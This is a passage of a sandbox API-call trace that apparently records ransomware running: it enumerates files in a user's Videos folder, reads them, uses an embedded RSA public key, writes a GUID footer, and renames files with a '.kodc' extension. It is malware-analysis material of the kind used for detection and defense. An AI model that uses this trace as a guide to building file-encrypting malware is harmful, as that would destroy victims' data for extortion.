dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c538 [0100.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c20 [0100.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c580 [0100.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c38 [0100.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c68 [0100.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c80 [0100.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.308] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c68 | out: hHeap=0x630000) returned 1 [0100.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c80 | out: hHeap=0x630000) returned 1 [0100.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0100.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7c80 [0100.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7c68 [0100.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0100.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0100.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0100.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c80 | out: hHeap=0x630000) returned 1 [0100.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c68 | out: hHeap=0x630000) returned 1 [0100.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.309] GetCurrentThreadId () returned 0x42c [0100.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba69c8 [0100.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.310] GetCurrentThreadId () returned 0x42c [0100.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c68 [0100.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c80 [0100.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c50 [0100.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.312] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x48ef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.312] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.312] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.312] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.312] CloseHandle (hObject=0x5cc) returned 1 [0100.325] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lNC_IynejbQe.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lnc_iynejbqe.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lNC_IynejbQe.avi.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lnc_iynejbqe.avi.kodc")) returned 1 [0100.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.326] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0100.327] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe822a6b0, ftCreationTime.dwHighDateTime=0x1d5c268, ftLastAccessTime.dwLowDateTime=0x2396700, ftLastAccessTime.dwHighDateTime=0x1d5bcb0, ftLastWriteTime.dwLowDateTime=0x2396700, ftLastWriteTime.dwHighDateTime=0x1d5bcb0, nFileSizeHigh=0x0, nFileSizeLow=0x88a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lxTxgdj8XUNpt.swf", cAlternateFileName="LXTXGD~1.SWF")) returned 1 [0100.327] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lxTxgdj8XUNpt.swf") returned=".swf" [0100.327] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lxTxgdj8XUNpt.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lxtxgdj8xunpt.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.328] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=34978) returned 1 [0100.328] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.331] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x887c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.331] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.333] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.333] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.333] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x88a2, lpOverlapped=0x0) returned 1 [0100.333] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.333] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.333] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.333] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0100.335] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.335] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.335] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.335] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.335] GetLastError () returned 0x0 [0100.335] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.335] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0100.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.335] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.335] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.335] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x88a0) returned 0x9ba6d90 [0100.336] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c580 [0100.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c38 [0100.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c5c8 [0100.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c50 [0100.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c80 [0100.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c98 [0100.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.336] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c80 | out: hHeap=0x630000) returned 1 [0100.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c98 | out: hHeap=0x630000) returned 1 [0100.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0100.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7c98 [0100.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7c80 [0100.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0100.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0100.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0100.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c98 | out: hHeap=0x630000) returned 1 [0100.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c80 | out: hHeap=0x630000) returned 1 [0100.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.338] GetCurrentThreadId () returned 0x42c [0100.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba6a58 [0100.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.338] GetCurrentThreadId () returned 0x42c [0100.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c80 [0100.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.339] RtlAllocateHeap 